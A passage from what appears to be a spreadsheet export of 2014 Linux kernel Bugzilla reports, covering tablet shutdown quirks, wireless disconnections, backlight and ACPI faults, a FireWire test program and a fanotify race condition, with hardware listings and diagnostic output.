    <t>Created attachment 126901 [details] poweroff patch from Jan Michael Brummer I have a Dell Venue 8 Pro, and I've been working with several other folks with similar tablets - that is, tablets based on the first-generation Intel Baytrail platform. They all appear to need quirk handling to shutdown / reboot correctly. I'm attaching a couple of patches. Jan Michael Brummer at Intel wrote the 'poweroff' patch and the reboot quirk for the Venue 8 Pro. I've been applying those two to my 'fedlet' kernel builds - see https://www.happyassassin.net/fedlet-a-fedora-remix-for-bay-trail-tablets/ - and they make the V8P shut down and reboot reliably for me, and others with V8Ps who've tested the build. The 'reboot quirk' patch contains that V8P quirk. It also contains a quirk for the Asus T100TA which has been written and tested by Jacek Danecki. It also contains a quirk for the Lenovo Miix 2: I don't have one of these, but someone following my Fedlet posts contacted me and sent the dmidecode, so I wrote a quirk based on that. Phil Knirsch at Red Hat has an HP Omni 10, and I've contacted him to ask if it also has the same shutdown/reboot problems, and to ask for dmidecode output so we could add a quirk for that one too.</t>
  </si>
  <si>
    <t>AMD APU reset infinite</t>
  </si>
  <si>
    <t>3.13.6</t>
  </si>
  <si>
    <t>2014-03-18 06:51 UTC</t>
  </si>
  <si>
    <t>ArLi Weng</t>
  </si>
  <si>
    <t>2014-08-18 15:30 UTC</t>
  </si>
  <si>
    <t>Created attachment 129901 [details] lshw and demsg on kernel 3.13.6, i can't start system with acpi_cpufreq, just Infinite reboot, even if i try disable the AMD turbo core or AMD cool quiet. but fine when i blacklist acpi_cpufreq, and at linux-lts 3.10.33 work fine with acpi_cpufreq. i can't login system, so i can't try cpufreq-utils, and try boot to lts kernel with last time `dmesg` got nothing wrong, just reboot like i pust reset button... here my hardware: Main Board: MSI A88XM-E45 (AMD A88X) CPU: AMD APU 6600K Memory: 2133MHz 4Gx2 $ lspci 00:00.0 Host bridge: Advanced Micro Devices, Inc. [AMD] Family 15h (Models 10h-1fh) Processor Root Complex 00:00.2 IOMMU: Advanced Micro Devices, Inc. [AMD] Family 15h (Models 10h-1fh) I/O Memory Management Unit 00:01.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] Richland [Radeon HD 8570D] 00:01.1 Audio device: Advanced Micro Devices, Inc. [AMD/ATI] Trinity HDMI Audio Controller 00:04.0 PCI bridge: Advanced Micro Devices, Inc. [AMD] Family 15h (Models 10h-1fh) Processor Root Port 00:05.0 PCI bridge: Advanced Micro Devices, Inc. [AMD] Family 15h (Models 10h-1fh) Processor Root Port 00:10.0 USB controller: Advanced Micro Devices, Inc. [AMD] FCH USB XHCI Controller (rev 09) 00:10.1 USB controller: Advanced Micro Devices, Inc. [AMD] FCH USB XHCI Controller (rev 09) 00:11.0 SATA controller: Advanced Micro Devices, Inc. [AMD] FCH SATA Controller [AHCI mode] (rev 40) 00:12.0 USB controller: Advanced Micro Devices, Inc. [AMD] FCH USB OHCI Controller (rev 11) 00:12.2 USB controller: Advanced Micro Devices, Inc. [AMD] FCH USB EHCI Controller (rev 11) 00:13.0 USB controller: Advanced Micro Devices, Inc. [AMD] FCH USB OHCI Controller (rev 11) 00:13.2 USB controller: Advanced Micro Devices, Inc. [AMD] FCH USB EHCI Controller (rev 11) 00:14.0 SMBus: Advanced Micro Devices, Inc. [AMD] FCH SMBus Controller (rev 16) 00:14.2 Audio device: Advanced Micro Devices, Inc. [AMD] FCH Azalia Controller (rev 01) 00:14.3 ISA bridge: Advanced Micro Devices, Inc. [AMD] FCH LPC Bridge (rev 11) 00:14.4 PCI bridge: Advanced Micro Devices, Inc. [AMD] FCH PCI Bridge (rev 40) 00:14.5 USB controller: Advanced Micro Devices, Inc. [AMD] FCH USB OHCI Controller (rev 11) 00:18.0 Host bridge: Advanced Micro Devices, Inc. [AMD] Family 15h (Models 10h-1fh) Processor Function 0 00:18.1 Host bridge: Advanced Micro Devices, Inc. [AMD] Family 15h (Models 10h-1fh) Processor Function 1 00:18.2 Host bridge: Advanced Micro Devices, Inc. [AMD] Family 15h (Models 10h-1fh) Processor Function 2 00:18.3 Host bridge: Advanced Micro Devices, Inc. [AMD] Family 15h (Models 10h-1fh) Processor Function 3 00:18.4 Host bridge: Advanced Micro Devices, Inc. [AMD] Family 15h (Models 10h-1fh) Processor Function 4 00:18.5 Host bridge: Advanced Micro Devices, Inc. [AMD] Family 15h (Models 10h-1fh) Processor Function 5 01:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller (rev 0c) 02:00.0 USB controller: Renesas Technology Corp. uPD720202 USB 3.0 Host Controller (rev 02) $ uname -a Linux anix-nb 3.13.6-1-ARCH #1 SMP PREEMPT Fri Mar 7 22:47:48 CET 2014 x86_64 GNU/Linux $ cat /etc/issue Arch Linux \r (\l) and attach `dmesg` and `lshw` without acpi_cpufreq.</t>
  </si>
  <si>
    <t>rt2800 oops on skb_push, apparently underflows the skb area</t>
  </si>
  <si>
    <t>3.14-rc6</t>
  </si>
  <si>
    <t>2014-03-19 11:29 UTC</t>
  </si>
  <si>
    <t>Antti S. Lankila</t>
  </si>
  <si>
    <t>Created attachment 130031 [details] Digital camera shot of the oops I have RT2800-based 5 GHz wireless card that serves as access point with hostapd. The hardware has served me well for years, until a new hostapd was uploaded on 6.3.2014 into Ubuntu repositories. From that day onwards, I have been unable to use rt2800pci except for about an hour at a time before the system freezes in an oops. I found Tuomas Räsänen complaining about a crash that smells like the same issue to me: http://permalink.gmane.org/gmane.linux.drivers.rt2x00.user/2460 This bug is duplicate of ubuntu bug https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1289378</t>
  </si>
  <si>
    <t>acpi backlight does not expose full brightness on Haswell-ULT</t>
  </si>
  <si>
    <t>3.13.6-1-ARCH</t>
  </si>
  <si>
    <t>2014-03-19 17:54 UTC</t>
  </si>
  <si>
    <t>Nico Schottelius</t>
  </si>
  <si>
    <t>2014-12-10 19:28 UTC</t>
  </si>
  <si>
    <t>When trying to increase the backlight to the maximum via acpi, it only reaches 765 of 937 as seen in the intel driver. How to reproduce: % xbacklight -set 100 % cat /sys/devices/pci0000:00/0000:00:02.0/drm/card0/card0-eDP-1/intel_backlight/brightness 765 % cat /sys/devices/pci0000:00/0000:00:02.0/drm/card0/card0-eDP-1/intel_backlight/max_brightness 937 echo'ing 937 &gt; the brightness file increases the backlight a lot and imho this maximum value should be exposed via ACPI. This is a follow up of a bug reported at x.org: https://bugs.freedesktop.org/show_bug.cgi?id=75085 Background information: Lenovo Yoga 2 Pro [18:50] artist:intel_backlight% lspci 00:00.0 Host bridge: Intel Corporation Haswell-ULT DRAM Controller (rev 09) 00:02.0 VGA compatible controller: Intel Corporation Haswell-ULT Integrated Graphics Controller (rev 09) 00:03.0 Audio device: Intel Corporation Device 0a0c (rev 09) 00:04.0 Signal processing controller: Intel Corporation Device 0a03 (rev 09) 00:14.0 USB controller: Intel Corporation Lynx Point-LP USB xHCI HC (rev 04) 00:16.0 Communication controller: Intel Corporation Lynx Point-LP HECI #0 (rev 04) 00:1b.0 Audio device: Intel Corporation Lynx Point-LP HD Audio Controller (rev 04) 00:1c.0 PCI bridge: Intel Corporation Lynx Point-LP PCI Express Root Port 1 (rev e4) 00:1d.0 USB controller: Intel Corporation Lynx Point-LP USB EHCI #1 (rev 04) 00:1f.0 ISA bridge: Intel Corporation Lynx Point-LP LPC Controller (rev 04) 00:1f.2 SATA controller: Intel Corporation Lynx Point-LP SATA Controller 1 [AHCI mode] (rev 04) 00:1f.3 SMBus: Intel Corporation Lynx Point-LP SMBus Controller (rev 04) 00:1f.6 Signal processing controller: Intel Corporation Lynx Point-LP Thermal (rev 04) 01:00.0 Network controller: Intel Corporation Wireless 7260 (rev 6b) [18:52] artist:intel_backlight% X -version X.Org X Server 1.15.0 Release Date: 2013-12-27 X Protocol Version 11, Revision 0 Build Operating System: Linux 3.12.5-1-ARCH x86_64 Current Operating System: Linux artist 3.13.6-1-ARCH #1 SMP PREEMPT Fri Mar 7 22:47:48 CET 2014 x86_64 Kernel command line: BOOT_IMAGE=/vmlinuz-linux root=/dev/mapper/root rw cryptdevice=/dev/sda3:root quiet Build Date: 09 January 2014 08:47:24AM Current version of pixman: 0.32.4 Before reporting problems, check http://wiki.x.org to make sure that you have the latest version. [18:53] artist:intel_backlight% pacman -Q | grep -e xorg -e "^linux " linux 3.13.6-1 xorg-bdftopcf 1.0.4-1 xorg-font-util 1.3.0-1 xorg-font-utils 7.6-3 xorg-fonts-100dpi 1.0.1-4 xorg-fonts-75dpi 1.0.3-1 xorg-fonts-alias 1.0.3-1 xorg-fonts-encodings 1.0.4-3 xorg-fonts-misc 1.0.1-2 xorg-luit 1.1.1-2 xorg-mkfontdir 1.0.7-1 xorg-mkfontscale 1.1.1-1 xorg-server 1.15.0-5 xorg-server-common 1.15.0-5 xorg-server-devel 1.15.0-5 xorg-server-xnest 1.15.0-5 xorg-setxkbmap 1.3.0-1 xorg-util-macros 1.18.0-1 xorg-xauth 1.0.8-1 xorg-xbacklight 1.2.0-1 xorg-xdpyinfo 1.3.1-1 xorg-xev 1.2.1-1 xorg-xinit 1.3.3-3 xorg-xinput 1.6.1-1 xorg-xkbcomp 1.2.4-1 xorg-xkill 1.0.4-1 xorg-xrandr 1.4.1-1 xorg-xrdb 1.1.0-1 xorg-xset 1.2.3-1 xorg-xsetroot 1.1.1-1 xorg-xwd 1.0.6-1</t>
  </si>
  <si>
    <t>Toshiba Qosmio X75-A7298 - Can't Adjust Brightness</t>
  </si>
  <si>
    <t>3.13.0-18-generic x86_64</t>
  </si>
  <si>
    <t>2014-03-20 14:07 UTC</t>
  </si>
  <si>
    <t>Lonnie Lee Best</t>
  </si>
  <si>
    <t>2014-10-23 08:15 UTC</t>
  </si>
  <si>
    <t>The Toshiba Qosmio X75-A7298 is running Ubuntu 14.04 blazingly fast. The only issue I've noticed, is that the OS doesn't seem to have a proper mapping to this laptop's function keys. Specifically, I'm unable to adjust the screen's brightness. Looking a the keyboard layout, I should be able to dim the screen by holding down the FN key and then press F2. Alternatively, to make the screen brighter you'd key FN-F3. This is a fantasic laptop, I'd like to help (if I can) to get it fully functional for Ubuntu 14.04. ProblemType: Bug DistroRelease: Ubuntu 14.04 Package: linux-image-3.13.0-18-generic 3.13.0-18.38 [modified: boot/vmlinuz-3.13.0-18-generic] ProcVersionSignature: Ubuntu 3.13.0-18.38-generic 3.13.6 Uname: Linux 3.13.0-18-generic x86_64 ApportVersion: 2.13.3-0ubuntu1 Architecture: amd64 AudioDevicesInUse: USER PID ACCESS COMMAND /dev/snd/controlC1: steve 2503 F.... pulseaudio /dev/snd/controlC0: steve 2503 F.... pulseaudio CRDA: country TW: (2402 - 2472 @ 40), (3, 27) (5270 - 5330 @ 40), (3, 17), DFS (5735 - 5815 @ 40), (3, 30) CurrentDesktop: Unity Date: Thu Mar 20 08:43:44 2014 HibernationDevice: RESUME=UUID=c040a1e4-2261-47d3-85df-a01363cf3fca InstallationDate: Installed on 2014-03-19 (0 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Alpha amd64 (20140319) MachineType: TOSHIBA Qosmio X75-A ProcFB: 0 inteldrmfb ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-3.13.0-18-generic root=UUID=82c4632b-cc2b-48f4-b42f-61690dbc80b7 ro quiet splash vt.handoff=7 RelatedPackageVersions: linux-restricted-modules-3.13.0-18-generic N/A linux-backports-modules-3.13.0-18-generic N/A linux-firmware 1.126 SourcePackage: linux UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 09/18/2013 dmi.bios.vendor: Insyde Corp. dmi.bios.version: 1.30 dmi.board.asset.tag: Type2 - Board Asset Tag dmi.board.name: Type2 - Board Product Name1 dmi.board.vendor: Type2 - Board Vendor Name1 dmi.board.version: Type2 - Board Version dmi.chassis.asset.tag: No Asset Tag dmi.chassis.type: 10 dmi.chassis.vendor: OEM Chassis Manufacturer dmi.chassis.version: OEM Chassis Version dmi.modalias: dmi:bvnInsydeCorp.:bvr1.30:bd09/18/2013:svnTOSHIBA:pnQosmioX75-A:pvrPSPLTU-017016:rvnType2-BoardVendorName1:rnType2-BoardProductName1:rvrType2-BoardVersion:cvnOEMChassisManufacturer:ct10:cvrOEMChassisVersion: dmi.product.name: Qosmio X75-A dmi.product.version: PSPLTU-017016 dmi.sys.vendor: TOSHIBA For more details about hardware and configuration go here: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1295141</t>
  </si>
  <si>
    <t>iwlwifi 7260: beacon loss which leads to disconnections</t>
  </si>
  <si>
    <t>2014-03-21 16:33 UTC</t>
  </si>
  <si>
    <t>Ralf Jung</t>
  </si>
  <si>
    <t>2014-06-10 20:17 UTC</t>
  </si>
  <si>
    <t>I am having trouble with the wireless connection of my Laptop (using an Intel 7260). Every now and then (totally unreproducible so far, but usually 2 to 5 times a day), packages will just stop flowing. Sometimes it helps to quit all applications using the network. Sometimes I have to disconnect and reconnect to the wireless, or power the card off and back on. Alternatively I can wait ~10min for the issue to pass by. Checking with Wireshark what's happening, I can see tons and tons of EAPOL messages, and (almost) nothing else. In the syslog, I can see the following every ~5 seconds, each time followed by a connection re-negotation: wlan0: CTRL-EVENT-DISCONNECTED bssid=00:09:5b:96:8a:bc reason=4 According to [0], reason 4 is "WLAN_REASON_DISASSOC_DUE_TO_INACTIVITY" - but the issue also happens when I am browsing, or chatting. I tried switching the access point, to no avail (the issue is present both with the FritzBox 3270, and the fairly old NetGear WGR614 v2). I also tried upgrading the firmware from version 22.15.8.0 (shipped with Debian) to 22.24.8.0, which did not help either. I will attach the syslog and dmesg output from one of these "bursts of connection drops". Here's "lspci -v" about the card: 03:00.0 Network controller: Intel Corporation Wireless 7260 (rev 73) Subsystem: Intel Corporation Dual Band Wireless-AC 7260 Flags: bus master, fast devsel, latency 0, IRQ 50 Memory at ddc00000 (64-bit, non-prefetchable) [size=8K] Capabilities: [c8] Power Management version 3 Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [40] Express Endpoint, MSI 00 Capabilities: [100] Advanced Error Reporting Capabilities: [140] Device Serial Number fc-f8-ae-ff-ff-51-88-9e Capabilities: [14c] Latency Tolerance Reporting Capabilities: [154] Vendor Specific Information: ID=cafe Rev=1 Len=014 &lt;?&gt; Kernel driver in use: iwlwifi This is with the "3.13-1-amd64 #1 SMP Debian 3.13.5-1" kernel from current Debian testing amd64. [0]: https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/tree/include/linux/ieee80211.h</t>
  </si>
  <si>
    <t>intel_pstate.c does not support scaling_cur_freq and breaks gkrellm-gkfreq monitor</t>
  </si>
  <si>
    <t>3.13.8</t>
  </si>
  <si>
    <t>2014-04-09 15:47 UTC</t>
  </si>
  <si>
    <t>2015-07-21 19:22 UTC</t>
  </si>
  <si>
    <t>I have been using AMD processors for years but my new systems are Intel Haswell (i5-4770S and i7-4770). With the old systems I can use a gkrellm plugin to display the current frequencies for each CPU. With the new Haswell processors, this is no longer true. The reason is that /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq which is ro0444 is not created. Unfortunately, /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_cur_freq cannot be used because it is ro0400 and needs access by superuser. This could be viewed as an RFE or as a bug report since it does break some existing code (gkrellm-gkfreq and xfce4-cpufreq-plugin). I do not normally work with kernel code but I am looking at intel_pstate.c to see if I can figure out a patch to add the functionality.</t>
  </si>
  <si>
    <t>acpi_tb_validate_xsdt causes early kernel panic - x86 AMI BIOS F2-F4</t>
  </si>
  <si>
    <t>3.13.0-rc7</t>
  </si>
  <si>
    <t>2014-04-12 22:52 UTC</t>
  </si>
  <si>
    <t>Bruce Chiarelli</t>
  </si>
  <si>
    <t>2014-06-24 07:42 UTC</t>
  </si>
  <si>
    <t>Between 3.13 and 3.14, a change was made that made the kernel refuse to boot. I was able to see the tail end of a backtrace using earlyprintk=vga,keep, but it freezes hard and I can't scroll back or save it anywhere. Using git-bisect, the first revision that fails is 671cc68dc61f029d44b43a681356078e02d8dab8.</t>
  </si>
  <si>
    <t>suspend: Some devices failed to suspend</t>
  </si>
  <si>
    <t>3.14.1 - 3.15-rc</t>
  </si>
  <si>
    <t>2014-04-17 23:09 UTC</t>
  </si>
  <si>
    <t>wxg4net</t>
  </si>
  <si>
    <t>2015-07-21 18:57 UTC</t>
  </si>
  <si>
    <t>Created attachment 132841 [details] suspend dmesg [pc:~] dmesg | grep fail [ 0.294492] ACPI: \_PR_.P003: failed to get CPU APIC ID. [ 0.294495] ACPI: \_PR_.P004: failed to get CPU APIC ID. [ 0.294497] ACPI: \_PR_.P005: failed to get CPU APIC ID. [ 0.294500] ACPI: \_PR_.P006: failed to get CPU APIC ID. [ 0.294749] acpi PNP0A03:00: _OSC failed (AE_SUPPORT); disabling ASPM [ 358.435996] serial 00:0a: disable failed [ 358.436005] PM: Device 00:0a failed to suspend: error -5 [ 358.713839] PM: Some devices failed to suspend, or early wake event detected [ 360.279019] serial 00:0a: disable failed [ 360.279034] PM: Device 00:0a failed to suspend: error -5 [ 360.546168] PM: Some devices failed to suspend, or early wake event detected [ 367.806589] serial 00:0a: disable failed [ 367.806597] PM: Device 00:0a failed to suspend: error -5 [ 368.085033] PM: Some devices failed to suspend, or early wake event detected</t>
  </si>
  <si>
    <t>iwlwifi 7260 device frequently reconnects</t>
  </si>
  <si>
    <t>3.14.4-1-ARCH</t>
  </si>
  <si>
    <t>2014-04-21 13:29 UTC</t>
  </si>
  <si>
    <t>Berni Moses</t>
  </si>
  <si>
    <t>2014-06-08 15:52 UTC</t>
  </si>
  <si>
    <t>Created attachment 133211 [details] Some logs. Hi, i bought a DELL XPS13 9333 (Haswell), Intel Core i7-4500U, 8GB RAM with a Intel Dual-Band Wireless-AC 7260 Adapter Card with Bluetooth 4.0 integrated (http://www.intel.com/content/www/us/en/wireless-products/dual-band-wireless-ac-7260-bluetooth.html). I have installed Arch Linux on it and all worked out of the box. But after a while i experienced some problems with my wifi connection. It arbitrary reconnects very often. Sometimes after a reboot, sometimes after several hours of use, sometimes after standby, ... I already searched around the web and found a similar looking bug: https://bugzilla.kernel.org/show_bug.cgi?id=70881 But with the kernel i use this problem is already fixed. I have attached some logs: dmesg, journal, iw scan dump, tcpdump Thanks for the help.</t>
  </si>
  <si>
    <t>[TRIVIAL]make menuconfig help text for CONFIG_DM_CRYPT is outdated</t>
  </si>
  <si>
    <t>3.10.32 (and probably all others)</t>
  </si>
  <si>
    <t>2014-04-29 22:45 UTC</t>
  </si>
  <si>
    <t>Walter Dnes</t>
  </si>
  <si>
    <t>2015-11-10 02:54 UTC</t>
  </si>
  <si>
    <t>The "make menuconfig" help text for CONFIG_DM_CRYPT points to http://www.saout.de/misc/dm-crypt/ for further info... &gt; Information on how to use dm-crypt can be found on &gt; &gt; &lt;http://www.saout.de/misc/dm-crypt/&gt; ...but that site says... &gt; Note: This page is horribly out of date. &gt; You can find the current pages for the dm-crypt project (the Linux &gt; kernel part) here: http://code.google.com/p/cryptsetup/wiki/DMCrypt &gt; and the project page for the command line tool cryptsetup (with Linux &gt; Unified Key Setup - LUKS) here: http://code.google.com/p/cryptsetup/ Suggested solution; change help-text link(s) to point to http://code.google.com/p/cryptsetup/wiki/DMCrypt and to http://code.google.com/p/cryptsetup/</t>
  </si>
  <si>
    <t>iwlwifi 7260: panic when setting frequency for monitor mode</t>
  </si>
  <si>
    <t>3.14.2</t>
  </si>
  <si>
    <t>2014-05-05 21:02 UTC</t>
  </si>
  <si>
    <t>Kerry Calvert</t>
  </si>
  <si>
    <t>2014-05-08 15:14 UTC</t>
  </si>
  <si>
    <t>With an Intel 7260 wireless card installed, and the iwlwifi-7620-8.ucode downloaded from the Intel support site installed, the following operation causes the kernel to lock ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up iwconfig wlan0 freq 2462M The same set of operations with the iwlwifi-7620-7.ucode firmware works. Intel recommends the 7620-8 firmware with the 3.14.2 kernel, and there are other problems with the card that warranted the search to upgrade the firmware/drivers to solve.</t>
  </si>
  <si>
    <t>Faill of battery detection on Lenovo Z480 with probability 5-10%</t>
  </si>
  <si>
    <t>3.14.2-1-ARCH</t>
  </si>
  <si>
    <t>2014-05-06 10:03 UTC</t>
  </si>
  <si>
    <t>naszar</t>
  </si>
  <si>
    <t>2014-07-08 07:21 UTC</t>
  </si>
  <si>
    <t>Created attachment 135211 [details] output of dmesg (last line after rmmod battery&amp;&amp;modprobe battery) Sometimes battery detection in module battery fails, reloading of module solves problem. I see this bug from Linux-3.7.4 until Linux-3.14.2.</t>
  </si>
  <si>
    <t>spurious wake from suspend to freeze - IVB Ultrabook</t>
  </si>
  <si>
    <t>3.15-rc5</t>
  </si>
  <si>
    <t>2014-05-14 19:42 UTC</t>
  </si>
  <si>
    <t>2015-07-21 19:02 UTC</t>
  </si>
  <si>
    <t>Created attachment 136111 [details] acpidump.out.gz On an IVB core-i5 ultrabook... echo freeze &gt; /sys/power/state works, but the system wakes up in under 10 seconds /sys/kernel/debug/wakeup_sources shows that BAT0 is ticking away... Looking at what is counting in /sys/firmware/acpi/interrupts... echo disable &gt; /sys/firmware/acpi/interrups/gpe1B stops the spurious wakeups, and I'm able to stay frozen as long as desired, until button-press wakeup. Another workaround is to boot without the acpi battery driver.</t>
  </si>
  <si>
    <t>backlight changing to maximum when plug or unplug AC</t>
  </si>
  <si>
    <t>kernel-3.15.0-0.rc5.git2.9.fc21</t>
  </si>
  <si>
    <t>2014-05-19 12:30 UTC</t>
  </si>
  <si>
    <t>Igor Gnatenko</t>
  </si>
  <si>
    <t>2015-01-06 07:38 UTC</t>
  </si>
  <si>
    <t>Steps to reproduce: 1. Set backlight to &lt;100% with keyboard 2. Plug or unplug AC Actual results: Backlight changed to maximum Expected results: Backlight unchanged Additional info: # grep -r . /sys/class/backlight/* /sys/class/backlight/intel_backlight/type:raw /sys/class/backlight/intel_backlight/brightness:444 /sys/class/backlight/intel_backlight/power/control:auto /sys/class/backlight/intel_backlight/power/async:disabled /sys/class/backlight/intel_backlight/power/runtime_enabled:disabled /sys/class/backlight/intel_backlight/power/runtime_active_kids:0 /sys/class/backlight/intel_backlight/power/runtime_active_time:0 grep: /sys/class/backlight/intel_backlight/power/autosuspend_delay_ms: Input/output error /sys/class/backlight/intel_backlight/power/runtime_status:unsupported /sys/class/backlight/intel_backlight/power/runtime_usage:0 /sys/class/backlight/intel_backlight/power/runtime_suspended_time:0 /sys/class/backlight/intel_backlight/bl_power:0 /sys/class/backlight/intel_backlight/max_brightness:4438 /sys/class/backlight/intel_backlight/actual_brightness:444 I think this is caused, because in my system doesn't present acpi_video0. Only intel_backlight. But it's normal for the my system: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5915a3db0c3983f1cd5e046bf70086c7d0c686d2 https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=67b662e189f469c6d373f81d76b0ef0495940e99 https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=fbc9fe1b4f222a7c575e3bd8e9defe59c6190a04 https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0e9f81d3b7cd0649a3bc437391b6a0650f98f844</t>
  </si>
  <si>
    <t>raw1394_arm_register() fails on kernel 3.14.x</t>
  </si>
  <si>
    <t>2014-05-26 13:15 UTC</t>
  </si>
  <si>
    <t>Fabien Spindler</t>
  </si>
  <si>
    <t>2014-11-18 07:06 UTC</t>
  </si>
  <si>
    <t>Created attachment 137411 [details] test_arm_register.c Dear, I have a device connected throw firewire to a computer running Linux (Fedora 20 or Ubuntu 14.04). I use raw1394_arm_register() to map an area starting at 0x100000000000LL. When the kernel version is 3.13.x (tested with 3.13.0-24 ubuntu x86_64, 3.13.6-200-fc20.x86_64, 3.13.10-200-fc20.x86_64) raw1394_arm_register() is able to register. But with a kernel 3.14.x (tested on 3.14.3-200.fc20.x86_64, 3.14.4-200.fc20.x86_64) raw1394_arm_register() returns Device or resource busy. Below I have attached a sample test. On 3.14.x it produces the following output: $ ./test_arm_register Start address: 0x1000000000 Number of board detected: 1 nodes on bus: 2, card name: /dev/fw1 set port: 0 error allocation arm register: Device or resource busy error num 0, 57005 I hope that a solution could be found to fix that issue. Fabien --- begin test_arm_register.c --- #include &lt;stdio.h&gt; #include &lt;libraw1394/raw1394.h&gt; #define ADDR_HI ((nodeaddr_t)0x10ULL) #define ADDR_LO ((nodeaddr_t)0x0ULL) int main() { raw1394handle_t handle = NULL; int number_of_1394cards; int stt; int i; nodeaddr_t addr = (ADDR_HI&lt;&lt;32) + ADDR_LO; size_t length = 0x1000; octlet_t pointer_to_handle = NULL; struct raw1394_portinfo ports_information[16]; int port = 0; printf("Start address: 0x%lX\n", addr); handle = raw1394_new_handle(); if (! handle) { perror("coundn't get handle"); return -1; } number_of_1394cards = raw1394_get_port_info(handle, ports_information, 16); if (number_of_1394cards &lt; 0) { perror("no card detected"); return -1; } printf("Number of board detected: %d\n", number_of_1394cards); // Print all cards informations for (i = 0; i &lt; number_of_1394cards; i++) { printf(" nodes on bus: %2d, card name: %s\n", ports_information[i].nodes, ports_information[i].name ); } printf("set port: %d\n", port); if (raw1394_set_port(handle, port) &lt; 0) { perror("couldn't set port"); return -1; } stt = raw1394_arm_register(handle, addr, length, NULL, pointer_to_handle, RAW1394_ARM_READ | RAW1394_ARM_WRITE, RAW1394_ARM_READ | RAW1394_ARM_WRITE, 0 ); if (stt &lt; 0) { perror("error allocation arm register"); raw1394_errcode_t error = raw1394_get_errcode (handle); printf("error num %d, %d\n", error, raw1394_errcode_to_errno(error) ); return -1; } printf("arm register successfully allocated\n"); return 0; } --- end test_arm_register.c --- --- begin Makefile --- CC=gcc CFLAGS=-g LIBS=-lraw1394 all: test_arm_register test_arm_register: test_arm_register.c $(CC) $(CFLAGS) $&lt; -o $@ $(LIBS) clean: rm -f test_arm_register rm *~ --- end Makefile ---</t>
  </si>
  <si>
    <t>brightness changes to minimum on AC plug/unplug and whenever thinkpad_acpi detects EC Thermal Table has changed</t>
  </si>
  <si>
    <t>3.15-rc7</t>
  </si>
  <si>
    <t>2014-05-29 10:27 UTC</t>
  </si>
  <si>
    <t>Anton Gubarkov</t>
  </si>
  <si>
    <t>2015-01-06 07:39 UTC</t>
  </si>
  <si>
    <t>Lenovo Thinkpad T540p , 2 video cards, running vanilla kernel. steps to reproduce: adjust brightness by F5/F6 to a suitable value. plug or unplug a power cord brightness is dropped to a minimum value. Expected behavior - brightness doesn't change Every plug/unplug causes the kernel to emit: May 29 14:18:22 r9-008cln kernel: thinkpad_acpi: EC reports that Thermal Table has changed These events happen sometimes w/o AC plug/unplug. Every time this event happens, the brightness is dropped to a minimum value. They can go in series of 5-6 in a row.</t>
  </si>
  <si>
    <t>fanotify: race condition in case of error in fanotify_read</t>
  </si>
  <si>
    <t>2014-06-03 18:31 UTC</t>
  </si>
  <si>
    <t>Heinrich Schuchardt</t>
  </si>
  <si>
    <t>2014-11-01 08:33 UTC</t>
  </si>
  <si>
    <t>When working on the error handling in fanotify_read I several times received a kernel panic. One example is in https://lkml.org/lkml/2014/5/19/701 In my code I always immediately closed the fanotify file descriptor if reading from the fanotify file descriptor returned an error. Inspecting the code this is how a race condition can arise: It all starts with copy_event_to_user returning an error for a permission event. Fanotify_read now calls wake_up(&amp;group-&gt;fanotify_data.access_waitq); Here is were the race begins. The "user" thread that called fanotify_read returns to the user code. The user code call close() on the fanotify file descriptor. This results in call sequence: fanotify_release fsnotify_destroy_group fsnotify_flush_notify fsnotify_destroy_event fanotify_free_event fsnotify_destroy_event here is protected by mutex_lock(&amp;group-&gt;notification_mutex); At some undefined time the "event" thread that received the wake_up awakes. It returns to fanotify_get_response, which returns to fanotify_handle_event. Now fanotify_handle_event calls fsnotify_destroy_event, which calls fanotify_free_event. On the "event" thread there is no mutex protecting the group or the event. Thus there is no protection against freeing the same memory twice.</t>
  </si>
  <si>
    <t>ACPI Events not being reported to OS without intel_idle.max_cstate=0 - Notebook Clevo w350etq</t>
  </si>
  <si>
    <t>3.14.5</t>
  </si>
  <si>
    <t>2014-06-06 18:47 UTC</t>
  </si>
  <si>
    <t>qbanin</t>
  </si>
  <si>
    <t>2015-07-21 19:44 UTC</t>
  </si>
  <si>
    <t>Hi, Device: Notebook Clevo w350etq Kernel Linux XNOTE 3.14.5-qba5 #5 SMP PREEMPT Fri Jun 6 18:44:39 CEST 2014 x86_64 GNU/Linux (custom compilation) Disto: Debian SID I have problem with acpi support form this notebook. ACPI events (such as: AC (un)plug, brigtness change, power&amp; sleep btn press) are not being reported correcly (or at all). Sometimes it happens right after system boot, sometimes it work for few min - few hour and then stop. Tried acpi_listen when this problem occured - no output. In most of cases if I run "acpi" command to manually query system some of the pending ACPI events unstuck for few mins and print out in acpi_listen window, at least for few mins. Already tries "clear stale EC events" patch for samsung notebooks - no change. Here's my dsdt (with few errors fixed): http://pastebin.com/vQzbqgdB qba@XNOTE:~$ lspci 00:00.0 Host bridge: Intel Corporation 3rd Gen Core processor DRAM Controller (rev 09) 00:01.0 PCI bridge: Intel Corporation Xeon E3-1200 v2/3rd Gen Core processor PCI Express Root Port (rev 09) 00:02.0 VGA compatible controller: Intel Corporation 3rd Gen Core processor Graphics Controller (rev 09) 00:14.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB xHCI Host Controller (rev 04) 00:16.0 Communication controller: Intel Corporation 7 Series/C210 Series Chipset Family MEI Controller #1 (rev 04) 00:1a.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB Enhanced Host Controller #2 (rev 04) 00:1b.0 Audio device: Intel Corporation 7 Series/C210 Series Chipset Family High Definition Audio Controller (rev 04) 00:1c.0 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family 